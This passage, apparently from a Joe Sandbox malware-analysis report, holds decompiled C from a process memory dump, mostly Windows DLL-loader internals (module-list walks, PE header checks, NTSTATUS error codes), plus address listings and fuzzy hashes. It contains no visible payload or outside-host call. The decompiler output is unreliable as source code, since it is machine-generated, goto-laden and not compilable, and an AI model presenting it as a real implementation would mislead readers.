                            						if( *((char*)(_t200 + _t363)) != 0) {
                            							goto L109;
                            						} else {
                            							while(1) {
                            								L5:
                            								_t353 = 0;
                            								_t342 = 0x1000;
                            								_v176 = 0;
                            								if(_t287 == 0) {
                            									break;
                            								}
                            								_t384 = _t287 -  *0x38b7b90; // 0x77cd0000
                            								if(_t384 == 0) {
                            									_t353 =  *0x38b7b8c; // 0x31d3db8
                            									_v176 = _t353;
                            									_t63 = _t353 + 0x50; // 0x31d3e68
                            									_t64 =  *_t63 + 0x20; // 0x9
                            									_t320 =  *_t64;
                            									_v184 = _t320;
                            								} else {
                            									E037E2280(_t200, 0x38b84d8);
                            									_t277 =  *0x38b85f4; // 0x31d1fe0
                            									_t351 =  *0x38b85f8 & 1;
                            									while(_t277 != 0) {
                            										_t21 = _t277 - 0x50; // 0x77280000
                            										_t337 =  *_t21;
                            										if(_t337 > _t287) {
                            											_t338 = _t337 | 0xffffffff;
                            										} else {
                            											asm("sbb ecx, ecx");
                            											_t338 =  ~_t337;
                            										}
                            										_t387 = _t338;
                            										if(_t387 < 0) {
                            											_t339 =  *_t277;
                            											__eflags = _t351;
                            											if(_t351 != 0) {
                            												__eflags = _t339;
                            												if(_t339 == 0) {
                            													goto L16;
                            												} else {
                            													goto L118;
                            												}
                            												goto L151;
                            											} else {
                            												goto L16;
                            											}
                            											goto L17;
                            										} else {
                            											if(_t387 <= 0) {
                            												__eflags = _t277;
                            												if(_t277 != 0) {
                            													_t23 = _t277 - 0x18; // 0x31d3f88
                            													_t340 =  *_t23;
                            													_t24 = _t277 - 0x68; // 0x31d1f78
                            													_t353 = _t24;
                            													_v176 = _t353;
                            													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
                            													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
                            														_t279 =  *_t340;
                            														__eflags =  *(_t279 - 0x20) & 0x00000020;
                            														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                            															asm("lock inc dword [edi+0x9c]");
                            															_t30 = _t353 + 0x50; // 0x31d3f88
                            															_t340 =  *_t30;
                            														}
                            													}
                            													_t31 = _t340 + 0x20; // 0x9
                            													_v184 =  *_t31;
                            												}
                            											} else {
                            												_t22 = _t277 + 4; // 0x31d5138
                            												_t339 =  *_t22;
                            												if(_t351 != 0) {
                            													__eflags = _t339;
                            													if(_t339 == 0) {
                            														goto L16;
                            													} else {
                            														L118:
                            														_t277 = _t277 ^ _t339;
                            														goto L17;
                            													}
                            													goto L151;
                            												} else {
                            													L16:
                            													_t277 = _t339;
                            												}
                            												goto L17;
                            											}
                            										}
                            										goto L25;
                            										L17:
                            									}
                            									L25:
                            									E037DFFB0(_t287, _t353, 0x38b84d8);
                            									_t320 = _v184;
                            									_t342 = 0x1000;
                            								}
                            								if(_t353 == 0) {
                            									break;
                            								} else {
                            									_t366 = 0;
                            									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                            										_t288 = _v164;
                            										if(_t353 != 0) {
                            											_t342 = _t288;
                            											_t374 = E0381CC99(_t353, _t288, _v200, 1,  &_v168);
                            											if(_t374 >= 0) {
                            												if(_v184 == 7) {
                            													__eflags = _a20;
                            													if(__eflags == 0) {
                            														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                            														if(__eflags != 0) {
                            															_t271 = E037D6600(0x38b52d8);
                            															__eflags = _t271;
                            															if(__eflags == 0) {
                            																_t342 = 0;
                            																_v169 = _t271;
                            																_t374 = E037D7926( *(_t353 + 0x50), 0,  &_v169);
                            															}
                            														}
                            													}
                            												}
                            												if(_t374 < 0) {
                            													_v168 = 0;
                            												} else {
                            													if( *0x38bb239 != 0) {
                            														_t342 =  *(_t353 + 0x18);
                            														E0384E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                            													}
                            													if( *0x38b8472 != 0) {
                            														_v192 = 0;
                            														_t342 =  *0x7ffe0330;
                            														_t361 =  *0x38bb218; // 0x0
                            														asm("ror edi, cl");
                            														 *0x38bb1e0( &_v192, _t353, _v168, 0, _v180);
                            														 *(_t361 ^  *0x7ffe0330)();
                            														_t269 = _v192;
                            														_t353 = _v176;
                            														__eflags = _t269;
                            														if(__eflags != 0) {
                            															_v168 = _t269;
                            														}
                            													}
                            												}
                            											}
                            											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                            												_t366 = 0xc000007a;
                            											}
                            											_t247 =  *(_t353 + 0x50);
                            											if(_t247[3] == 0xffffffff) {
                            												L40:
                            												if(_t366 == 0xc000007a) {
                            													__eflags = _t288;
                            													if(_t288 == 0) {
                            														goto L136;
                            													} else {
                            														_t366 = 0xc0000139;
                            													}
                            													goto L54;
                            												}
                            											} else {
                            												_t249 =  *_t247;
                            												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                            													goto L40;
                            												} else {
                            													_t250 = _t249 | 0xffffffff;
                            													asm("lock xadd [edi+0x9c], eax");
                            													if((_t249 | 0xffffffff) == 0) {
                            														E037E2280(_t250, 0x38b84d8);
                            														_t342 =  *(_t353 + 0x54);
                            														_t165 = _t353 + 0x54; // 0x54
                            														_t252 = _t165;
                            														__eflags =  *(_t342 + 4) - _t252;
                            														if( *(_t342 + 4) != _t252) {
                            															L135:
                            															asm("int 0x29");
                            															L136:
                            															_t288 = _v200;
                            															_t366 = 0xc0000138;
                            															L54:
                            															_t342 = _t288;
                            															L03803898(0, _t288, _t366);
                            														} else {
                            															_t324 =  *(_t252 + 4);
                            															__eflags =  *_t324 - _t252;
                            															if( *_t324 != _t252) {
                            																goto L135;
                            															} else {
                            																 *_t324 = _t342;
                            																 *(_t342 + 4) = _t324;
                            																_t293 =  *(_t353 + 0x50);
                            																_v180 =  *_t293;
                            																E037DFFB0(_t293, _t353, 0x38b84d8);
                            																__eflags =  *((short*)(_t353 + 0x3a));
                            																if( *((short*)(_t353 + 0x3a)) != 0) {
                            																	_t342 = 0;
                            																	__eflags = 0;
                            																	E038037F5(_t353, 0);
                            																}
                            																E03800413(_t353);
                            																_t256 =  *(_t353 + 0x48);
                            																__eflags = _t256;
                            																if(_t256 != 0) {
                            																	__eflags = _t256 - 0xffffffff;
                            																	if(_t256 != 0xffffffff) {
                            																		E037F9B10(_t256);
                            																	}
                            																}
                            																__eflags =  *(_t353 + 0x28);
                            																if( *(_t353 + 0x28) != 0) {
                            																	_t174 = _t353 + 0x24; // 0x24
                            																	E037F02D6(_t174);
                            																}
                            																L037E77F0( *0x38b7b98, 0, _t353);
                            																__eflags = _v180 - _t293;
                            																if(__eflags == 0) {
                            																	E037FC277(_t293, _t366);
                            																}
                            																_t288 = _v164;
                            																goto L40;
                            															}
                            														}
                            													} else {
                            														goto L40;
                            													}
                            												}
                            											}
                            										}
                            									} else {
                            										L037DEC7F(_t353);
                            										L037F19B8(_t287, 0, _t353, 0);
                            										_t200 = E037CF4E3(__eflags);
                            										continue;
                            									}
                            								}
                            								L41:
                            								if(_v157 != 0) {
                            									L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                            								}
                            								if(_t366 < 0) {
                            									L46:
                            									 *_v212 = _v168;
                            									_t204 = _t366;
                            									L47:
                            									_pop(_t354);
                            									_pop(_t367);
                            									_pop(_t289);
                            									return E0380B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                            								} else {
                            									_t206 =  *0x38bb2f8; // 0xcc0000
                            									if((_t206 |  *0x38bb2fc) == 0 || ( *0x38bb2e4 & 0x00000001) != 0) {
                            										goto L46;
                            									} else {
                            										_t297 =  *0x38bb2ec; // 0x100
                            										_v200 = 0;
                            										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
                            											_t355 = _v168;
                            											_t342 =  &_v208;
                            											_t208 = E03876B68(_v168,  &_v208, _v168, __eflags);
                            											__eflags = _t208 - 1;
                            											if(_t208 == 1) {
                            												goto L46;
                            											} else {
                            												__eflags = _v208 & 0x00000010;
                            												if((_v208 & 0x00000010) == 0) {
                            													goto L46;
                            												} else {
                            													_t342 = 4;
                            													_t366 = E03876AEB(_t355, 4,  &_v216);
                            													__eflags = _t366;
                            													if(_t366 >= 0) {
                            														goto L46;
                            													} else {
                            														asm("int 0x29");
                            														_t356 = 0;
                            														_v44 = 0;
                            														_t290 = _v52;
                            														__eflags = 0;
                            														if(0 == 0) {
                            															L108:
                            															_t356 = 0;
                            															_v44 = 0;
                            															goto L63;
                            														} else {
                            															__eflags = 0;
                            															if(0 < 0) {
                            																goto L108;
                            															}
                            															L63:
                            															_v112 = _t356;
                            															__eflags = _t356;
                            															if(_t356 == 0) {
                            																L143:
                            																_v8 = 0xfffffffe;
                            																_t211 = 0xc0000089;
                            															} else {
                            																_v36 = 0;
                            																_v60 = 0;
                            																_v48 = 0;
                            																_v68 = 0;
                            																_v44 = _t290 & 0xfffffffc;
                            																E037DE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                            																_t306 = _v68;
                            																__eflags = _t306;
                            																if(_t306 == 0) {
                            																	_t216 = 0xc000007b;
                            																	_v36 = 0xc000007b;
                            																	_t307 = _v60;
                            																} else {
                            																	__eflags = _t290 & 0x00000001;
                            																	if(__eflags == 0) {
                            																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                            																		__eflags = _t349 - 0x10b;
                            																		if(_t349 != 0x10b) {
                            																			__eflags = _t349 - 0x20b;
                            																			if(_t349 == 0x20b) {
                            																				goto L102;
                            																			} else {
                            																				_t307 = 0;
                            																				_v48 = 0;
                            																				_t216 = 0xc000007b;
                            																				_v36 = 0xc000007b;
                            																				goto L71;
                            																			}
                            																		} else {
                            																			L102:
                            																			_t307 =  *(_t306 + 0x50);
                            																			goto L69;
                            																		}
                            																		goto L151;
                            																	} else {
                            																		_t239 = L037DEAEA(_t290, _t290, _t356, _t366, __eflags);
                            																		_t307 = _t239;
                            																		_v60 = _t307;
                            																		_v48 = _t307;
                            																		__eflags = _t307;
                            																		if(_t307 != 0) {
                            																			L70:
                            																			_t216 = _v36;
                            																		} else {
                            																			_push(_t239);
                            																			_push(0x14);
                            																			_push( &_v144);
                            																			_push(3);
                            																			_push(_v44);
                            																			_push(0xffffffff);
                            																			_t319 = E03809730();
                            																			_v36 = _t319;
                            																			__eflags = _t319;
                            																			if(_t319 < 0) {
                            																				_t216 = 0xc000001f;
                            																				_v36 = 0xc000001f;
                            																				_t307 = _v60;
                            																			} else {
                            																				_t307 = _v132;
                            																				L69:
                            																				_v48 = _t307;
                            																				goto L70;
                            																			}
                            																		}
                            																	}
                            																}
                            																L71:
                            																_v72 = _t307;
                            																_v84 = _t216;
                            																__eflags = _t216 - 0xc000007b;
                            																if(_t216 == 0xc000007b) {
                            																	L150:
                            																	_v8 = 0xfffffffe;
                            																	_t211 = 0xc000007b;
                            																} else {
                            																	_t344 = _t290 & 0xfffffffc;
                            																	_v76 = _t344;
                            																	__eflags = _v40 - _t344;
                            																	if(_v40 <= _t344) {
                            																		goto L150;
                            																	} else {
                            																		__eflags = _t307;
                            																		if(_t307 == 0) {
                            																			L75:
                            																			_t217 = 0;
                            																			_v104 = 0;
                            																			__eflags = _t366;
                            																			if(_t366 != 0) {
                            																				__eflags = _t290 & 0x00000001;
                            																				if((_t290 & 0x00000001) != 0) {
                            																					_t217 = 1;
                            																					_v104 = 1;
                            																				}
                            																				_t290 = _v44;
                            																				_v52 = _t290;
                            																			}
                            																			__eflags = _t217 - 1;
                            																			if(_t217 != 1) {
                            																				_t369 = 0;
                            																				_t218 = _v40;
                            																				goto L91;
                            																			} else {
                            																				_v64 = 0;
                            																				E037DE9C0(1, _t290, 0, 0,  &_v64);
                            																				_t309 = _v64;
                            																				_v108 = _t309;
                            																				__eflags = _t309;
                            																				if(_t309 == 0) {
                            																					goto L143;
                            																				} else {
                            																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                            																					__eflags = _t226 - 0x10b;
                            																					if(_t226 != 0x10b) {
                            																						__eflags = _t226 - 0x20b;
                            																						if(_t226 != 0x20b) {
                            																							goto L143;
                            																						} else {
                            																							_t371 =  *(_t309 + 0x98);
                            																							goto L83;
                            																						}
                            																					} else {
                            																						_t371 =  *(_t309 + 0x88);
                            																						L83:
                            																						__eflags = _t371;
                            																						if(_t371 != 0) {
                            																							_v80 = _t371 - _t356 + _t290;
                            																							_t310 = _v64;
                            																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                            																							_t292 =  *(_t310 + 6) & 0x0000ffff;
                            																							_t311 = 0;
                            																							__eflags = 0;
                            																							while(1) {
                            																								_v120 = _t311;
                            																								_v116 = _t348;
                            																								__eflags = _t311 - _t292;
                            																								if(_t311 >= _t292) {
                            																									goto L143;
                            																								}
                            																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
                            																								__eflags = _t371 - _t359;
                            																								if(_t371 < _t359) {
                            																									L98:
                            																									_t348 = _t348 + 0x28;
                            																									_t311 = _t311 + 1;
                            																									continue;
                            																								} else {
                            																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                            																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                            																										goto L98;
                            																									} else {
                            																										__eflags = _t348;
                            																										if(_t348 == 0) {
                            																											goto L143;
                            																										} else {
                            																											_t218 = _v40;
                            																											_t312 =  *_t218;
                            																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                            																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                            																												_v100 = _t359;
                            																												_t360 = _v108;
                            																												_t372 = L037D8F44(_v108, _t312);
                            																												__eflags = _t372;
                            																												if(_t372 == 0) {
                            																													goto L143;
                            																												} else {
                            																													_t290 = _v52;
                            																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E03803C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                            																													_t307 = _v72;
                            																													_t344 = _v76;
                            																													_t218 = _v40;
                            																													goto L91;
                            																												}
                            																											} else {
                            																												_t290 = _v52;
                            																												_t307 = _v72;
                            																												_t344 = _v76;
                            																												_t369 = _v80;
                            																												L91:
                            																												_t358 = _a4;
                            																												__eflags = _t358;
                            																												if(_t358 == 0) {
                            																													L95:
                            																													_t308 = _a8;
                            																													__eflags = _t308;
                            																													if(_t308 != 0) {
                            																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
                            																													}
                            																													_v8 = 0xfffffffe;
                            																													_t211 = _v84;
                            																												} else {
                            																													_t370 =  *_t218 - _t369 + _t290;
                            																													 *_t358 = _t370;
                            																													__eflags = _t370 - _t344;
                            																													if(_t370 <= _t344) {
                            																														L149:
                            																														 *_t358 = 0;
                            																														goto L150;
                            																													} else {
                            																														__eflags = _t307;
                            																														if(_t307 == 0) {
                            																															goto L95;
                            																														} else {
                            																															__eflags = _t370 - _t344 + _t307;
                            																															if(_t370 >= _t344 + _t307) {
                            																																goto L149;
                            																															} else {
                            																																goto L95;
                            																															}
                            																														}
                            																													}
                            																												}
                            																											}
                            																										}
                            																									}
                            																								}
                            																								goto L97;
                            																							}
                            																						}
                            																						goto L143;
                            																					}
                            																				}
                            																			}
                            																		} else {
                            																			__eflags = _v40 - _t307 + _t344;
                            																			if(_v40 >= _t307 + _t344) {
                            																				goto L150;
                            																			} else {
                            																				goto L75;
                            																			}
                            																		}
                            																	}
                            																}
                            															}
                            															L97:
                            															 *[fs:0x0] = _v20;
                            															return _t211;
                            														}
                            													}
                            												}
                            											}
                            										} else {
                            											goto L46;
                            										}
                            									}
                            								}
                            								goto L151;
                            							}
                            							_t288 = _v164;
                            							_t366 = 0xc0000135;
                            							goto L41;
                            						}
                            					}
                            				}
                            				L151:
                            			}

                            0x037dd7b1
                            0x0382b3c5
                            0x0382b3c5
                            0x037dd7c3
                            0x037dd7ca
                            0x037dd7e5
                            0x037dd7eb
                            0x037dd8eb
                            0x037dd8ed
                            0x00000000
                            0x037dd8f3
                            0x037dd8f3
                            0x037dd8f3
                            0x00000000
                            0x037dd8ed
                            0x037dd7cc
                            0x037dd7cc
                            0x037dd7d2
                            0x00000000
                            0x037dd7d4
                            0x037dd7d4
                            0x037dd7d7
                            0x037dd7df
                            0x0382b3d4
                            0x0382b3d9
                            0x0382b3dc
                            0x0382b3dc
                            0x0382b3df
                            0x0382b3e2
                            0x0382b468
                            0x0382b46d
                            0x0382b46f
                            0x0382b46f
                            0x0382b475
                            0x037dd8f8
                            0x037dd8f9
                            0x037dd8fd
                            0x0382b3e8
                            0x0382b3e8
                            0x0382b3eb
                            0x0382b3ed
                            0x00000000
                            0x0382b3ef
                            0x0382b3ef
                            0x0382b3f1
                            0x0382b3f4
                            0x0382b3fe
                            0x0382b404
                            0x0382b409
                            0x0382b40e
                            0x0382b410
                            0x0382b410
                            0x0382b414
                            0x0382b414
                            0x0382b41b
                            0x0382b420
                            0x0382b423
                            0x0382b425
                            0x0382b427
                            0x0382b42a
                            0x0382b42d
                            0x0382b42d
                            0x0382b42a
                            0x0382b432
                            0x0382b436
                            0x0382b438
                            0x0382b43b
                            0x0382b43b
                            0x0382b449
                            0x0382b44e
                            0x0382b454
                            0x0382b458
                            0x0382b458
                            0x0382b45d
                            0x00000000
                            0x0382b45d
                            0x0382b3ed
                            0x00000000
                            0x00000000
                            0x00000000
                            0x037dd7df
                            0x037dd7d2
                            0x037dd7ca
                            0x0382b37c
                            0x0382b37e
                            0x0382b385
                            0x0382b38a
                            0x00000000
                            0x0382b38a
                            0x037dd742
                            0x037dd7f1
                            0x037dd7f8
                            0x0382b49b
                            0x0382b49b
                            0x037dd800
                            0x037dd837
                            0x037dd843
                            0x037dd845
                            0x037dd847
                            0x037dd84a
                            0x037dd84b
                            0x037dd84e
                            0x037dd857
                            0x037dd802
                            0x037dd802
                            0x037dd80d
                            0x00000000
                            0x037dd818
                            0x037dd818
                            0x037dd824
                            0x037dd831
                            0x0382b4a5
                            0x0382b4ab
                            0x0382b4b3
                            0x0382b4b8
                            0x0382b4bb
                            0x00000000
                            0x0382b4c1
                            0x0382b4c1
                            0x0382b4c8
                            0x00000000
                            0x0382b4ce
                            0x0382b4d4
                            0x0382b4e1
                            0x0382b4e3
                            0x0382b4e5
                            0x00000000
                            0x0382b4eb
                            0x0382b4f0
                            0x0382b4f2
                            0x037ddac9
                            0x037ddacc
                            0x037ddacf
                            0x037ddad1
                            0x037ddd78
                            0x037ddd78
                            0x037ddcf2
                            0x00000000
                            0x037ddad7
                            0x037ddad9
                            0x037ddadb
                            0x00000000
                            0x00000000
                            0x037ddae1
                            0x037ddae1
                            0x037ddae4
                            0x037ddae6
                            0x0382b4f9
                            0x0382b4f9
                            0x0382b500
                            0x037ddaec
                            0x037ddaec
                            0x037ddaf5
                            0x037ddaf8
                            0x037ddafb
                            0x037ddb03
                            0x037ddb11
                            0x037ddb16
                            0x037ddb19
                            0x037ddb1b
                            0x0382b52c
                            0x0382b531
                            0x0382b534
                            0x037ddb21
                            0x037ddb21
                            0x037ddb24
                            0x037ddcd9
                            0x037ddce2
                            0x037ddce5
                            0x037ddd6a
                            0x037ddd6d
                            0x00000000
                            0x037ddd73
                            0x0382b51a
                            0x0382b51c
                            0x0382b51f
                            0x0382b524
                            0x00000000
                            0x0382b524
                            0x037ddce7
                            0x037ddce7
                            0x037ddce7
                            0x00000000
                            0x037ddce7
                            0x00000000
                            0x037ddb2a
                            0x037ddb2c
                            0x037ddb31
                            0x037ddb33
                            0x037ddb36
                            0x037ddb39
                            0x037ddb3b
                            0x037ddb66
                            0x037ddb66
                            0x037ddb3d
                            0x037ddb3d
                            0x037ddb3e
                            0x037ddb46
                            0x037ddb47
                            0x037ddb49
                            0x037ddb4c
                            0x037ddb53
                            0x037ddb55
                            0x037ddb58
                            0x037ddb5a
                            0x0382b50a
                            0x0382b50f
                            0x0382b512
                            0x037ddb60
                            0x037ddb60
                            0x037ddb63
                            0x037ddb63
                            0x00000000
                            0x037ddb63
                            0x037ddb5a
                            0x037ddb3b
                            0x037ddb24
                            0x037ddb69
                            0x037ddb69
                            0x037ddb6c
                            0x037ddb6f
                            0x037ddb74
                            0x0382b557
                            0x0382b557
                            0x0382b55e
                            0x037ddb7a
                            0x037ddb7c
                            0x037ddb7f
                            0x037ddb82
                            0x037ddb85
                            0x00000000
                            0x037ddb8b
                            0x037ddb8b
                            0x037ddb8d
                            0x037ddb9b
                            0x037ddb9b
                            0x037ddb9d
                            0x037ddba0
                            0x037ddba2
                            0x037ddba4
                            0x037ddba7
                            0x037ddba9
                            0x037ddbae
                            0x037ddbae
                            0x037ddbb1
                            0x037ddbb4
                            0x037ddbb4
                            0x037ddbb7
                            0x037ddbba
                            0x037ddcd2
                            0x037ddcd4
                            0x00000000
                            0x037ddbc0
                            0x037ddbc0
                            0x037ddbd2
                            0x037ddbd7
                            0x037ddbda
                            0x037ddbdd
                            0x037ddbdf
                            0x00000000
                            0x037ddbe5
                            0x037ddbe5
                            0x037ddbee
                            0x037ddbf1
                            0x0382b541
                            0x0382b544
                            0x00000000
                            0x0382b546
                            0x0382b546
                            0x00000000
                            0x0382b546
                            0x037ddbf7
                            0x037ddbf7
                            0x037ddbfd
                            0x037ddbfd
                            0x037ddbff
                            0x037ddc0b
                            0x037ddc15
                            0x037ddc1b
                            0x037ddc1d
                            0x037ddc21
                            0x037ddc21
                            0x037ddc23
                            0x037ddc23
                            0x037ddc26
                            0x037ddc29
                            0x037ddc2b
                            0x00000000
                            0x00000000
                            0x037ddc31
                            0x037ddc34
                            0x037ddc36
                            0x037ddcbf
                            0x037ddcbf
                            0x037ddcc2
                            0x00000000
                            0x037ddc3c
                            0x037ddc41
                            0x037ddc43
                            0x00000000
                            0x037ddc45
                            0x037ddc45
                            0x037ddc47
                            0x00000000
                            0x037ddc4d
                            0x037ddc4d
                            0x037ddc50
                            0x037ddc52
                            0x037ddc55
                            0x037ddcfa
                            0x037ddcfe
                            0x037ddd08
                            0x037ddd0a
                            0x037ddd0c
                            0x00000000
                            0x037ddd12
                            0x037ddd15
                            0x037ddd2d
                            0x037ddd2f
                            0x037ddd32
                            0x037ddd35
                            0x00000000
                            0x037ddd35
                            0x037ddc5b
                            0x037ddc5b
                            0x037ddc5e
                            0x037ddc61
                            0x037ddc64
                            0x037ddc67
                            0x037ddc67
                            0x037ddc6a
                            0x037ddc6c
                            0x037ddc8e
                            0x037ddc8e
                            0x037ddc91
                            0x037ddc93
                            0x037ddcce
                            0x037ddcce
                            0x037ddc95
                            0x037ddc9c
                            0x037ddc6e
                            0x037ddc72
                            0x037ddc75
                            0x037ddc77
                            0x037ddc79
                            0x0382b551
                            0x0382b551
                            0x00000000
                            0x037ddc7f
                            0x037ddc7f
                            0x037ddc81
                            0x00000000
                            0x037ddc83
                            0x037ddc86
                            0x037ddc88
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x037ddc88
                            0x037ddc81
                            0x037ddc79
                            0x037ddc6c
                            0x037ddc55
                            0x037ddc47
                            0x037ddc43
                            0x00000000
                            0x037ddc36
                            0x037ddc23
                            0x00000000
                            0x037ddbff
                            0x037ddbf1
                            0x037ddbdf
                            0x037ddb8f
                            0x037ddb92
                            0x037ddb95
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x037ddb95
                            0x037ddb8d
                            0x037ddb85
                            0x037ddb74
                            0x037ddc9f
                            0x037ddca2
                            0x037ddcb0
                            0x037ddcb0
                            0x037ddad1
                            0x0382b4e5
                            0x0382b4c8
                            0x00000000
                            0x00000000
                            0x00000000
                            0x037dd831
                            0x037dd80d
                            0x00000000
                            0x037dd800
                            0x0382b47f
                            0x0382b485
                            0x00000000
                            0x0382b485
                            0x037dd665
                            0x037dd652
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 478286bf1e3d5af942d16dcd1a867e4a163f55a1b329093d8d3724119d137c0c
                            • Instruction ID: e26e9a4dc0c12199609a05e8b11d38e5be45745d5d261e7e18cfd4a68d557658
                            • Opcode Fuzzy Hash: 478286bf1e3d5af942d16dcd1a867e4a163f55a1b329093d8d3724119d137c0c
                            • Instruction Fuzzy Hash: C6E1F434A0175ACFDB35DF68C884BA9BBB6BF85314F0801E9D9099B290D774AD81CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 92%
                            			E037D849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                            				void* _t136;
                            				signed int _t139;
                            				signed int _t141;
                            				signed int _t145;
                            				intOrPtr _t146;
                            				signed int _t149;
                            				signed int _t150;
                            				signed int _t161;
                            				signed int _t163;
                            				signed int _t165;
                            				signed int _t169;
                            				signed int _t171;
                            				signed int _t194;
                            				signed int _t200;
                            				void* _t201;
                            				signed int _t204;
                            				signed int _t206;
                            				signed int _t210;
                            				signed int _t214;
                            				signed int _t215;
                            				signed int _t218;
                            				void* _t221;
                            				signed int _t224;
                            				signed int _t226;
                            				intOrPtr _t228;
                            				signed int _t232;
                            				signed int _t233;
                            				signed int _t234;
                            				void* _t237;
                            				void* _t238;
                            
                            				_t236 = __esi;
                            				_t235 = __edi;
                            				_t193 = __ebx;
                            				_push(0x70);
                            				_push(0x389f9c0);
                            				E0381D0E8(__ebx, __edi, __esi);
                            				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                            				if( *0x38b7b04 == 0) {
                            					L4:
                            					goto L5;
                            				} else {
                            					_t136 = E037DCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                            					_t236 = 0;
                            					if(_t136 < 0) {
                            						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                            					}
                            					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                            						_t193 =  *( *[fs:0x30] + 0x18);
                            						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                            						 *(_t237 - 0x68) = _t236;
                            						 *(_t237 - 0x6c) = _t236;
                            						_t235 = _t236;
                            						 *(_t237 - 0x60) = _t236;
                            						E037E2280( *[fs:0x30], 0x38b8550);
                            						_t139 =  *0x38b7b04; // 0x1
                            						__eflags = _t139 - 1;
                            						if(__eflags != 0) {
                            							_t200 = 0xc;
                            							_t201 = _t237 - 0x40;
                            							_t141 = E037FF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                            							 *(_t237 - 0x44) = _t141;
                            							__eflags = _t141;
                            							if(_t141 < 0) {
                            								L50:
                            								E037DFFB0(_t193, _t235, 0x38b8550);
                            								L5:
                            								return E0381D130(_t193, _t235, _t236);
                            							}
                            							_push(_t201);
                            							_t221 = 0x10;
                            							_t202 =  *(_t237 - 0x40);
                            							_t145 = E037C1C45( *(_t237 - 0x40), _t221);
                            							 *(_t237 - 0x44) = _t145;
                            							__eflags = _t145;
                            							if(_t145 < 0) {
                            								goto L50;
                            							}
                            							_t146 =  *0x38b7b9c; // 0x0
                            							_t235 = L037E4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                            							 *(_t237 - 0x60) = _t235;
                            							__eflags = _t235;
                            							if(_t235 == 0) {
                            								_t149 = 0xc0000017;
                            								 *(_t237 - 0x44) = 0xc0000017;
                            							} else {
                            								_t149 =  *(_t237 - 0x44);
                            							}
                            							__eflags = _t149;
                            							if(__eflags >= 0) {
                            								L8:
                            								 *(_t237 - 0x64) = _t235;
                            								_t150 =  *0x38b7b10; // 0x8
                            								 *(_t237 - 0x4c) = _t150;
                            								_push(_t237 - 0x74);
                            								_push(_t237 - 0x39);
                            								_push(_t237 - 0x58);
                            								_t193 = E037FA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                            								 *(_t237 - 0x44) = _t193;
                            								__eflags = _t193;
                            								if(_t193 < 0) {
                            									L30:
                            									E037DFFB0(_t193, _t235, 0x38b8550);
                            									__eflags = _t235 - _t237 - 0x38;
                            									if(_t235 != _t237 - 0x38) {
                            										_t235 =  *(_t237 - 0x48);
                            										L037E77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                            									} else {
                            										_t235 =  *(_t237 - 0x48);
                            									}
                            									__eflags =  *(_t237 - 0x6c);
                            									if( *(_t237 - 0x6c) != 0) {
                            										L037E77F0(_t235, _t236,  *(_t237 - 0x6c));
                            									}
                            									__eflags = _t193;
                            									if(_t193 >= 0) {
                            										goto L4;
                            									} else {
                            										goto L5;
                            									}
                            								}
                            								_t204 =  *0x38b7b04; // 0x1
                            								 *(_t235 + 8) = _t204;
                            								__eflags =  *((char*)(_t237 - 0x39));
                            								if( *((char*)(_t237 - 0x39)) != 0) {
                            									 *(_t235 + 4) = 1;
                            									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                            									_t161 =  *0x38b7b10; // 0x8
                            									 *(_t237 - 0x4c) = _t161;
                            								} else {
                            									 *(_t235 + 4) = _t236;
                            									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                            								}
                            								 *((intOrPtr*)(_t237 - 0x54)) = E038037C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                            								_t224 = _t236;
                            								 *(_t237 - 0x40) = _t236;
                            								 *(_t237 - 0x50) = _t236;
                            								while(1) {
                            									_t163 =  *(_t235 + 8);
